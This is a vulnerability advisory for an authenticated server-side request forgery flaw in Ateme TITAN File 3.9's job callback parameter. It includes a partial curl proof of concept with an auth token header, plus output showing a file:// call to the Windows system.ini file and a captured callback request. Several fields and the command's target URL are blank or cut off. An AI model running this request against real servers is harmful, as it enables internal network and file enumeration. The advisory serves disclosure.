Ateme TITAN File 3.9 Job Callbacks SSRF File Enumeration  
Vendor: Ateme  
Product web page:  
Affected version:  
Summary: TITAN File is a multi-codec/format video transcoding  
software, for mezzanine, STB and ABR VOD, PostProduction, Playout  
and Archive applications. TITAN File is based on ATEME 5th Generation  
STREAM compression engine and delivers the highest video quality  
at minimum bitrates with accelerated parallel processing.  
Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability  
exists in the Titan File video transcoding software. The application  
parses user supplied data in the job callback url GET parameter. Since  
no validation is carried out on the parameter, an attacker can specify  
an external domain and force the application to make an HTTP/DNS/File  
request to an arbitrary destination. This can be used by an external  
attacker for example to bypass firewalls and initiate a service, file  
and network enumeration on the internal network through the affected  
Tested on: Microsoft Windows  
Ateme KFE Software  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2023-5781  
Advisory URL:  
curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \  
-H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \  
-H "User-Agent: sunee-mode" \  
Call to file://C:\\windows\\system.ini returned 0  
HTTP from Server  
POST / HTTP/1.1  
Accept: */*  
Content-Type: application/xml  
Content-Length: 192  
<?xml version='1.0' encoding='UTF-8' ?>  
<name>dummy test job</name>